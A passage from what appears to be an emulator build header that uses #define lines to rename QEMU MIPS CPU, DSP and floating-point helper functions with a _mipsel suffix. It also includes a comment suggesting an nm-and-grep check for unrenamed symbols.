helper_mtc0_watchlo_mipsel #define helper_mtc0_watchhi helper_mtc0_watchhi_mipsel #define helper_mthc0_watchhi helper_mthc0_watchhi_mipsel #define helper_mtc0_xcontext helper_mtc0_xcontext_mipsel #define helper_mtc0_framemask helper_mtc0_framemask_mipsel #define helper_mtc0_debug helper_mtc0_debug_mipsel #define helper_mttc0_debug helper_mttc0_debug_mipsel #define helper_mtc0_performance0 helper_mtc0_performance0_mipsel #define helper_mtc0_errctl helper_mtc0_errctl_mipsel #define helper_mtc0_taglo helper_mtc0_taglo_mipsel #define helper_mtc0_datalo helper_mtc0_datalo_mipsel #define helper_mtc0_taghi helper_mtc0_taghi_mipsel #define helper_mtc0_datahi helper_mtc0_datahi_mipsel #define helper_mftgpr helper_mftgpr_mipsel #define helper_mftlo helper_mftlo_mipsel #define helper_mfthi helper_mfthi_mipsel #define helper_mftacx helper_mftacx_mipsel #define helper_mftdsp helper_mftdsp_mipsel #define helper_mttgpr helper_mttgpr_mipsel #define helper_mttlo helper_mttlo_mipsel #define helper_mtthi helper_mtthi_mipsel #define helper_mttacx helper_mttacx_mipsel #define helper_mttdsp helper_mttdsp_mipsel #define helper_dmt helper_dmt_mipsel #define helper_emt helper_emt_mipsel #define helper_dvpe helper_dvpe_mipsel #define helper_evpe helper_evpe_mipsel #define helper_dvp helper_dvp_mipsel #define helper_evp helper_evp_mipsel #define cpu_mips_get_random cpu_mips_get_random_mipsel #define cpu_mips_init cpu_mips_init_mipsel #define helper_absq_s_ph helper_absq_s_ph_mipsel #define helper_absq_s_qb helper_absq_s_qb_mipsel #define helper_absq_s_w helper_absq_s_w_mipsel #define helper_absq_s_ob helper_absq_s_ob_mipsel #define helper_absq_s_qh helper_absq_s_qh_mipsel #define helper_absq_s_pw helper_absq_s_pw_mipsel #define helper_addqh_ph helper_addqh_ph_mipsel #define helper_addqh_r_ph helper_addqh_r_ph_mipsel #define helper_addqh_r_w helper_addqh_r_w_mipsel #define helper_addqh_w helper_addqh_w_mipsel #define helper_adduh_qb helper_adduh_qb_mipsel #define helper_adduh_r_qb helper_adduh_r_qb_mipsel #define helper_subqh_ph helper_subqh_ph_mipsel #define helper_subqh_r_ph helper_subqh_r_ph_mipsel #define helper_subqh_r_w helper_subqh_r_w_mipsel #define helper_subqh_w helper_subqh_w_mipsel #define helper_addq_ph helper_addq_ph_mipsel #define helper_addq_s_ph helper_addq_s_ph_mipsel #define helper_addq_s_w helper_addq_s_w_mipsel #define helper_addu_ph helper_addu_ph_mipsel #define helper_addu_qb helper_addu_qb_mipsel #define helper_addu_s_ph helper_addu_s_ph_mipsel #define helper_addu_s_qb helper_addu_s_qb_mipsel #define helper_subq_ph 
helper_subq_ph_mipsel #define helper_subq_s_ph helper_subq_s_ph_mipsel #define helper_subq_s_w helper_subq_s_w_mipsel #define helper_subu_ph helper_subu_ph_mipsel #define helper_subu_qb helper_subu_qb_mipsel #define helper_subu_s_ph helper_subu_s_ph_mipsel #define helper_subu_s_qb helper_subu_s_qb_mipsel #define helper_adduh_ob helper_adduh_ob_mipsel #define helper_adduh_r_ob helper_adduh_r_ob_mipsel #define helper_subuh_ob helper_subuh_ob_mipsel #define helper_subuh_r_ob helper_subuh_r_ob_mipsel #define helper_addq_pw helper_addq_pw_mipsel #define helper_addq_qh helper_addq_qh_mipsel #define helper_addq_s_pw helper_addq_s_pw_mipsel #define helper_addq_s_qh helper_addq_s_qh_mipsel #define helper_addu_ob helper_addu_ob_mipsel #define helper_addu_qh helper_addu_qh_mipsel #define helper_addu_s_ob helper_addu_s_ob_mipsel #define helper_addu_s_qh helper_addu_s_qh_mipsel #define helper_subq_pw helper_subq_pw_mipsel #define helper_subq_qh helper_subq_qh_mipsel #define helper_subq_s_pw helper_subq_s_pw_mipsel #define helper_subq_s_qh helper_subq_s_qh_mipsel #define helper_subu_ob helper_subu_ob_mipsel #define helper_subu_qh helper_subu_qh_mipsel #define helper_subu_s_ob helper_subu_s_ob_mipsel #define helper_subu_s_qh helper_subu_s_qh_mipsel #define helper_subuh_qb helper_subuh_qb_mipsel #define helper_subuh_r_qb helper_subuh_r_qb_mipsel #define helper_addsc helper_addsc_mipsel #define helper_addwc helper_addwc_mipsel #define helper_modsub helper_modsub_mipsel #define helper_raddu_w_qb helper_raddu_w_qb_mipsel #define helper_raddu_l_ob helper_raddu_l_ob_mipsel #define helper_precr_qb_ph helper_precr_qb_ph_mipsel #define helper_precrq_qb_ph helper_precrq_qb_ph_mipsel #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mipsel #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mipsel #define helper_precrq_ph_w helper_precrq_ph_w_mipsel #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mipsel #define helper_precr_ob_qh helper_precr_ob_qh_mipsel #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mipsel #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mipsel #define helper_precrq_ob_qh helper_precrq_ob_qh_mipsel #define helper_precrq_qh_pw helper_precrq_qh_pw_mipsel #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mipsel #define helper_precrq_pw_l helper_precrq_pw_l_mipsel #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mipsel #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mipsel #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mipsel #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mipsel #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mipsel #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mipsel #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mipsel #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mipsel #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mipsel #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mipsel #define helper_precequ_qh_obl helper_precequ_qh_obl_mipsel #define helper_precequ_qh_obr helper_precequ_qh_obr_mipsel #define helper_precequ_qh_obla helper_precequ_qh_obla_mipsel #define helper_precequ_qh_obra helper_precequ_qh_obra_mipsel #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mipsel #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mipsel #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mipsel #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mipsel #define helper_preceu_qh_obl helper_preceu_qh_obl_mipsel #define helper_preceu_qh_obr helper_preceu_qh_obr_mipsel #define helper_preceu_qh_obla 
helper_preceu_qh_obla_mipsel #define helper_preceu_qh_obra helper_preceu_qh_obra_mipsel #define helper_shll_qb helper_shll_qb_mipsel #define helper_shrl_qb helper_shrl_qb_mipsel #define helper_shra_qb helper_shra_qb_mipsel #define helper_shra_r_qb helper_shra_r_qb_mipsel #define helper_shll_ob helper_shll_ob_mipsel #define helper_shrl_ob helper_shrl_ob_mipsel #define helper_shra_ob helper_shra_ob_mipsel #define helper_shra_r_ob helper_shra_r_ob_mipsel #define helper_shll_ph helper_shll_ph_mipsel #define helper_shll_s_ph helper_shll_s_ph_mipsel #define helper_shll_qh helper_shll_qh_mipsel #define helper_shll_s_qh helper_shll_s_qh_mipsel #define helper_shrl_qh helper_shrl_qh_mipsel #define helper_shra_qh helper_shra_qh_mipsel #define helper_shra_r_qh helper_shra_r_qh_mipsel #define helper_shll_s_w helper_shll_s_w_mipsel #define helper_shra_r_w helper_shra_r_w_mipsel #define helper_shll_pw helper_shll_pw_mipsel #define helper_shll_s_pw helper_shll_s_pw_mipsel #define helper_shra_pw helper_shra_pw_mipsel #define helper_shra_r_pw helper_shra_r_pw_mipsel #define helper_shrl_ph helper_shrl_ph_mipsel #define helper_shra_ph helper_shra_ph_mipsel #define helper_shra_r_ph helper_shra_r_ph_mipsel #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mipsel #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mipsel #define helper_mulq_rs_ph helper_mulq_rs_ph_mipsel #define helper_mul_ph helper_mul_ph_mipsel #define helper_mul_s_ph helper_mul_s_ph_mipsel #define helper_mulq_s_ph helper_mulq_s_ph_mipsel #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mipsel #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mipsel #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mipsel #define helper_mulsa_w_ph helper_mulsa_w_ph_mipsel #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mipsel #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mipsel #define helper_mulq_rs_qh helper_mulq_rs_qh_mipsel #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mipsel #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mipsel #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mipsel #define helper_dpau_h_qbl helper_dpau_h_qbl_mipsel #define helper_dpau_h_qbr helper_dpau_h_qbr_mipsel #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mipsel #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mipsel #define helper_dpau_h_obl helper_dpau_h_obl_mipsel #define helper_dpau_h_obr helper_dpau_h_obr_mipsel #define helper_dpsu_h_obl helper_dpsu_h_obl_mipsel #define helper_dpsu_h_obr helper_dpsu_h_obr_mipsel #define helper_dpa_w_ph helper_dpa_w_ph_mipsel #define helper_dpax_w_ph helper_dpax_w_ph_mipsel #define helper_dps_w_ph helper_dps_w_ph_mipsel #define helper_dpsx_w_ph helper_dpsx_w_ph_mipsel #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mipsel #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mipsel #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mipsel #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mipsel #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mipsel #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mipsel #define helper_dpa_w_qh helper_dpa_w_qh_mipsel #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mipsel #define helper_dps_w_qh helper_dps_w_qh_mipsel #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mipsel #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mipsel #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mipsel #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mipsel #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mipsel #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mipsel #define helper_maq_s_w_phl helper_maq_s_w_phl_mipsel #define 
helper_maq_s_w_phr helper_maq_s_w_phr_mipsel #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mipsel #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mipsel #define helper_mulq_s_w helper_mulq_s_w_mipsel #define helper_mulq_rs_w helper_mulq_rs_w_mipsel #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mipsel #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mipsel #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mipsel #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mipsel #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mipsel #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mipsel #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mipsel #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mipsel #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mipsel #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mipsel #define helper_dmadd helper_dmadd_mipsel #define helper_dmaddu helper_dmaddu_mipsel #define helper_dmsub helper_dmsub_mipsel #define helper_dmsubu helper_dmsubu_mipsel #define helper_bitrev helper_bitrev_mipsel #define helper_insv helper_insv_mipsel #define helper_dinsv helper_dinsv_mipsel #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mipsel #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mipsel #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mipsel #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mipsel #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mipsel #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mipsel #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mipsel #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mipsel #define helper_cmpu_le_qb helper_cmpu_le_qb_mipsel #define helper_cmp_eq_ph helper_cmp_eq_ph_mipsel #define helper_cmp_lt_ph helper_cmp_lt_ph_mipsel #define helper_cmp_le_ph helper_cmp_le_ph_mipsel #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mipsel #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mipsel #define helper_cmpu_le_ob helper_cmpu_le_ob_mipsel #define helper_cmp_eq_qh helper_cmp_eq_qh_mipsel #define helper_cmp_lt_qh helper_cmp_lt_qh_mipsel #define helper_cmp_le_qh helper_cmp_le_qh_mipsel #define helper_cmp_eq_pw helper_cmp_eq_pw_mipsel #define helper_cmp_lt_pw helper_cmp_lt_pw_mipsel #define helper_cmp_le_pw helper_cmp_le_pw_mipsel #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mipsel #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mipsel #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mipsel #define helper_pick_qb helper_pick_qb_mipsel #define helper_pick_ph helper_pick_ph_mipsel #define helper_pick_ob helper_pick_ob_mipsel #define helper_pick_qh helper_pick_qh_mipsel #define helper_pick_pw helper_pick_pw_mipsel #define helper_packrl_ph helper_packrl_ph_mipsel #define helper_packrl_pw helper_packrl_pw_mipsel #define helper_extr_w helper_extr_w_mipsel #define helper_extr_r_w helper_extr_r_w_mipsel #define helper_extr_rs_w helper_extr_rs_w_mipsel #define helper_dextr_w helper_dextr_w_mipsel #define helper_dextr_r_w helper_dextr_r_w_mipsel #define helper_dextr_rs_w helper_dextr_rs_w_mipsel #define helper_dextr_l helper_dextr_l_mipsel #define helper_dextr_r_l helper_dextr_r_l_mipsel #define helper_dextr_rs_l helper_dextr_rs_l_mipsel #define helper_extr_s_h helper_extr_s_h_mipsel #define helper_dextr_s_h helper_dextr_s_h_mipsel #define helper_extp helper_extp_mipsel #define helper_extpdp helper_extpdp_mipsel #define helper_dextp helper_dextp_mipsel #define helper_dextpdp helper_dextpdp_mipsel #define helper_shilo helper_shilo_mipsel #define helper_dshilo helper_dshilo_mipsel #define helper_mthlip helper_mthlip_mipsel #define helper_dmthlip helper_dmthlip_mipsel #define cpu_wrdsp cpu_wrdsp_mipsel 
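/*
 * Editor's note (a possible sanity check, not part of the build):
 * after compiling the mipsel target, GNU nm can roughly confirm that
 * no unsuffixed QEMU symbols leak out of an object, e.g.
 *
 *     nm -g --defined-only translate.o | grep -v '_mipsel$'
 *
 * (object name illustrative). Any helper_* or tcg_* name printed
 * without the _mipsel suffix would suggest a symbol missing from
 * this rename list.
 */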
#define helper_wrdsp helper_wrdsp_mipsel #define cpu_rddsp cpu_rddsp_mipsel #define helper_rddsp helper_rddsp_mipsel #define helper_cfc1 helper_cfc1_mipsel #define helper_ctc1 helper_ctc1_mipsel #define ieee_ex_to_mips ieee_ex_to_mips_mipsel #define helper_float_sqrt_d helper_float_sqrt_d_mipsel #define helper_float_sqrt_s helper_float_sqrt_s_mipsel #define helper_float_cvtd_s helper_float_cvtd_s_mipsel #define helper_float_cvtd_w helper_float_cvtd_w_mipsel #define helper_float_cvtd_l helper_float_cvtd_l_mipsel #define helper_float_cvt_l_d helper_float_cvt_l_d_mipsel #define helper_float_cvt_l_s helper_float_cvt_l_s_mipsel #define helper_float_cvtps_pw helper_float_cvtps_pw_mipsel #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mipsel #define helper_float_cvts_d helper_float_cvts_d_mipsel #define helper_float_cvts_w helper_float_cvts_w_mipsel #define helper_float_cvts_l helper_float_cvts_l_mipsel #define helper_float_cvts_pl helper_float_cvts_pl_mipsel #define helper_float_cvts_pu helper_float_cvts_pu_mipsel #define helper_float_cvt_w_s helper_float_cvt_w_s_mipsel #define helper_float_cvt_w_d helper_float_cvt_w_d_mipsel #define helper_float_round_l_d helper_float_round_l_d_mipsel #define helper_float_round_l_s helper_float_round_l_s_mipsel #define helper_float_round_w_d helper_float_round_w_d_mipsel #define helper_float_round_w_s helper_float_round_w_s_mipsel #define helper_float_trunc_l_d helper_float_trunc_l_d_mipsel #define helper_float_trunc_l_s helper_float_trunc_l_s_mipsel #define helper_float_trunc_w_d helper_float_trunc_w_d_mipsel #define helper_float_trunc_w_s helper_float_trunc_w_s_mipsel #define helper_float_ceil_l_d helper_float_ceil_l_d_mipsel #define helper_float_ceil_l_s helper_float_ceil_l_s_mipsel #define helper_float_ceil_w_d helper_float_ceil_w_d_mipsel #define helper_float_ceil_w_s helper_float_ceil_w_s_mipsel #define helper_float_floor_l_d helper_float_floor_l_d_mipsel #define helper_float_floor_l_s helper_float_floor_l_s_mipsel #define helper_float_floor_w_d helper_float_floor_w_d_mipsel #define helper_float_floor_w_s helper_float_floor_w_s_mipsel #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mipsel #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mipsel #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mipsel #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mipsel #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mipsel #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mipsel #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mipsel #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mipsel #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mipsel #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mipsel #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mipsel #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mipsel #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mipsel #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mipsel #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mipsel #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mipsel #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mipsel #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mipsel #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mipsel #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mipsel #define helper_float_abs_d 
helper_float_abs_d_mipsel #define helper_float_abs_s helper_float_abs_s_mipsel #define helper_float_abs_ps helper_float_abs_ps_mipsel #define helper_float_chs_d helper_float_chs_d_mipsel #define helper_float_chs_s helper_float_chs_s_mipsel #define helper_float_chs_ps helper_float_chs_ps_mipsel #define helper_float_recip_d helper_float_recip_d_mipsel #define helper_float_recip_s helper_float_recip_s_mipsel #define helper_float_rsqrt_d helper_float_rsqrt_d_mipsel #define helper_float_rsqrt_s helper_float_rsqrt_s_mipsel #define helper_float_recip1_d helper_float_recip1_d_mipsel #define helper_float_recip1_s helper_float_recip1_s_mipsel #define helper_float_recip1_ps helper_float_recip1_ps_mipsel #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mipsel #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mipsel #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mipsel #define helper_float_rint_s helper_float_rint_s_mipsel #define helper_float_rint_d helper_float_rint_d_mipsel #define float_class_s float_class_s_mipsel #define helper_float_class_s helper_float_class_s_mipsel #define float_class_d float_class_d_mipsel #define helper_float_class_d helper_float_class_d_mipsel #define helper_float_add_d helper_float_add_d_mipsel #define helper_float_add_s helper_float_add_s_mipsel #define helper_float_add_ps helper_float_add_ps_mipsel #define helper_float_sub_d helper_float_sub_d_mipsel #define helper_float_sub_s helper_float_sub_s_mipsel #define helper_float_sub_ps helper_float_sub_ps_mipsel #define helper_float_mul_d helper_float_mul_d_mipsel #define helper_float_mul_s helper_float_mul_s_mipsel #define helper_float_mul_ps helper_float_mul_ps_mipsel #define helper_float_div_d helper_float_div_d_mipsel #define helper_float_div_s helper_float_div_s_mipsel #define helper_float_div_ps helper_float_div_ps_mipsel #define helper_float_recip2_d helper_float_recip2_d_mipsel #define helper_float_recip2_s helper_float_recip2_s_mipsel #define helper_float_recip2_ps helper_float_recip2_ps_mipsel #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mipsel #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mipsel #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mipsel #define helper_float_addr_ps helper_float_addr_ps_mipsel #define helper_float_mulr_ps helper_float_mulr_ps_mipsel #define helper_float_max_s helper_float_max_s_mipsel #define helper_float_max_d helper_float_max_d_mipsel #define helper_float_maxa_s helper_float_maxa_s_mipsel #define helper_float_maxa_d helper_float_maxa_d_mipsel #define helper_float_min_s helper_float_min_s_mipsel #define helper_float_min_d helper_float_min_d_mipsel #define helper_float_mina_s helper_float_mina_s_mipsel #define helper_float_mina_d helper_float_mina_d_mipsel #define helper_float_madd_d helper_float_madd_d_mipsel #define helper_float_madd_s helper_float_madd_s_mipsel #define helper_float_madd_ps helper_float_madd_ps_mipsel #define helper_float_msub_d helper_float_msub_d_mipsel #define helper_float_msub_s helper_float_msub_s_mipsel #define helper_float_msub_ps helper_float_msub_ps_mipsel #define helper_float_nmadd_d helper_float_nmadd_d_mipsel #define helper_float_nmadd_s helper_float_nmadd_s_mipsel #define helper_float_nmadd_ps helper_float_nmadd_ps_mipsel #define helper_float_nmsub_d helper_float_nmsub_d_mipsel #define helper_float_nmsub_s helper_float_nmsub_s_mipsel #define helper_float_nmsub_ps helper_float_nmsub_ps_mipsel #define helper_float_maddf_s helper_float_maddf_s_mipsel #define helper_float_maddf_d helper_float_maddf_d_mipsel #define 
helper_float_msubf_s helper_float_msubf_s_mipsel #define helper_float_msubf_d helper_float_msubf_d_mipsel #define helper_cmp_d_f helper_cmp_d_f_mipsel #define helper_cmpabs_d_f helper_cmpabs_d_f_mipsel #define helper_cmp_d_un helper_cmp_d_un_mipsel #define helper_cmpabs_d_un helper_cmpabs_d_un_mipsel #define helper_cmp_d_eq helper_cmp_d_eq_mipsel #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mipsel #define helper_cmp_d_ueq helper_cmp_d_ueq_mipsel #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mipsel #define helper_cmp_d_olt helper_cmp_d_olt_mipsel #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mipsel #define helper_cmp_d_ult helper_cmp_d_ult_mipsel #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mipsel #define helper_cmp_d_ole helper_cmp_d_ole_mipsel #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mipsel #define helper_cmp_d_ule helper_cmp_d_ule_mipsel #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mipsel #define helper_cmp_d_sf helper_cmp_d_sf_mipsel #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mipsel #define helper_cmp_d_ngle helper_cmp_d_ngle_mipsel #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mipsel #define helper_cmp_d_seq helper_cmp_d_seq_mipsel #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mipsel #define helper_cmp_d_ngl helper_cmp_d_ngl_mipsel #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mipsel #define helper_cmp_d_lt helper_cmp_d_lt_mipsel #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mipsel #define helper_cmp_d_nge helper_cmp_d_nge_mipsel #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mipsel #define helper_cmp_d_le helper_cmp_d_le_mipsel #define helper_cmpabs_d_le helper_cmpabs_d_le_mipsel #define helper_cmp_d_ngt helper_cmp_d_ngt_mipsel #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mipsel #define helper_cmp_s_f helper_cmp_s_f_mipsel #define helper_cmpabs_s_f helper_cmpabs_s_f_mipsel #define helper_cmp_s_un helper_cmp_s_un_mipsel #define helper_cmpabs_s_un helper_cmpabs_s_un_mipsel #define helper_cmp_s_eq helper_cmp_s_eq_mipsel #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mipsel #define helper_cmp_s_ueq helper_cmp_s_ueq_mipsel #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mipsel #define helper_cmp_s_olt helper_cmp_s_olt_mipsel #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mipsel #define helper_cmp_s_ult helper_cmp_s_ult_mipsel #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mipsel #define helper_cmp_s_ole helper_cmp_s_ole_mipsel #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mipsel #define helper_cmp_s_ule helper_cmp_s_ule_mipsel #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mipsel #define helper_cmp_s_sf helper_cmp_s_sf_mipsel #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mipsel #define helper_cmp_s_ngle helper_cmp_s_ngle_mipsel #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mipsel #define helper_cmp_s_seq helper_cmp_s_seq_mipsel #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mipsel #define helper_cmp_s_ngl helper_cmp_s_ngl_mipsel #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mipsel #define helper_cmp_s_lt helper_cmp_s_lt_mipsel #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mipsel #define helper_cmp_s_nge helper_cmp_s_nge_mipsel #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mipsel #define helper_cmp_s_le helper_cmp_s_le_mipsel #define helper_cmpabs_s_le helper_cmpabs_s_le_mipsel #define helper_cmp_s_ngt helper_cmp_s_ngt_mipsel #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mipsel #define helper_cmp_ps_f helper_cmp_ps_f_mipsel #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mipsel #define helper_cmp_ps_un helper_cmp_ps_un_mipsel #define 
helper_cmpabs_ps_un helper_cmpabs_ps_un_mipsel #define helper_cmp_ps_eq helper_cmp_ps_eq_mipsel #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mipsel #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mipsel #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mipsel #define helper_cmp_ps_olt helper_cmp_ps_olt_mipsel #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mipsel #define helper_cmp_ps_ult helper_cmp_ps_ult_mipsel #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mipsel #define helper_cmp_ps_ole helper_cmp_ps_ole_mipsel #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mipsel #define helper_cmp_ps_ule helper_cmp_ps_ule_mipsel #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mipsel #define helper_cmp_ps_sf helper_cmp_ps_sf_mipsel #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mipsel #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mipsel #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mipsel #define helper_cmp_ps_seq helper_cmp_ps_seq_mipsel #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mipsel #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mipsel #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mipsel #define helper_cmp_ps_lt helper_cmp_ps_lt_mipsel #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mipsel #define helper_cmp_ps_nge helper_cmp_ps_nge_mipsel #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mipsel #define helper_cmp_ps_le helper_cmp_ps_le_mipsel #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mipsel #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mipsel #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mipsel #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mipsel #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mipsel #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mipsel #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mipsel #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mipsel #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mipsel #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mipsel #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mipsel #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mipsel #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mipsel #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mipsel #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mipsel #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mipsel #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mipsel #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mipsel #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mipsel #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mipsel #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mipsel #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mipsel #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mipsel #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mipsel #define 